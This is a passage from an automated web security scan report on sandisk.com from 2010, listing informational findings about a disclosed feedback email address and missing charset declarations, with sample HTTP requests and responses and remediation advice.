3.161. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-sdhc

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.162. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-sdxc-cards

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.163. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-gaming-compatibility-pack

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.164. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-memory-stick-micro-m2

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.165. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-xbox-360-usb-flash-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.166. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/imaging/sandisk-extreme-sdhc-cards-

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.167. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.168. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-memory-stick-micro-m2

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.169. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.170. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-microsdhc

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.171. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-microsdhc.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.172. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.173. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.174. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/netbook-cards/sandisk-netbook-sdhc-memory-card

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.175. http://www.sandisk.com/products/readers-accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29556
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.176. http://www.sandisk.com/products/readers-accessories/large-memory-card-case previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/large-memory-card-case

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.177. http://www.sandisk.com/products/readers-accessories/micromate-sdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/micromate-sdhc

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.178. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-20-usb-readers

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.179. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-firewire-reader

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.180. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.181. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.182. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.183. http://www.sandisk.com/products/readers-accessories/sandisk®-mobilemate�?�-duo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk..-mobilemate...-duo

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:43:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.184. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.185. http://www.sandisk.com/products/slotradioproducts/sansaplayers-cards/card-vh1-classic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/slotradioproducts/sansaplayers-cards/card-vh1-classic

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.186. http://www.sandisk.com/sandisk-rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-rss

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14059
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.187. http://www.sandisk.com/sandisk-rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-rss.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14064
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.188. http://www.sandisk.com/sandisk-support/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-support/contact-us

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.189. http://www.sandisk.com/sandisk-support/driver-download-wizard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-support/driver-download-wizard

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.190. http://www.sandisk.com/sandisk-support/where-to-buy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-support/where-to-buy

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15284
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.191. http://www.sandisk.com/sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sitemap

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21487
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

4. HTML does not specify charset previous
There are 2 instances of this issue:

/microsites/OnlineExclusive/index.html
/writereview.htm

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

4.1. http://www.sandisk.com/microsites/OnlineExclusive/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/microsites/OnlineExclusive/index.html

Request

GET /microsites/OnlineExclusive/index.html HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Content-Length: 21132
Content-Type: text/html
Content-Location: http://www.sandisk.com/microsites/OnlineExclusive/index.html
Last-Modified: Tue, 20 Jul 2010 06:45:46 GMT
Accept-Ranges: bytes
ETag: "f4bec2ed727cb1:3827"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>SanDisk Onli
...[SNIP]...

4.2. http://www.sandisk.com/writereview.htm previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/writereview.htm

Request

GET /writereview.htm HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Content-Length: 4405
Content-Type: text/html
Content-Location: http://www.sandisk.com/writereview.htm
Last-Modified: Wed, 14 Apr 2010 20:51:16 GMT
Accept-Ranges: bytes
ETag: "cdae3e3a14dcca1:3827"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<script type="text/java
...[SNIP]...

Report generated by XSS.CX at Wed Nov 17 07:02:06 CST 2010.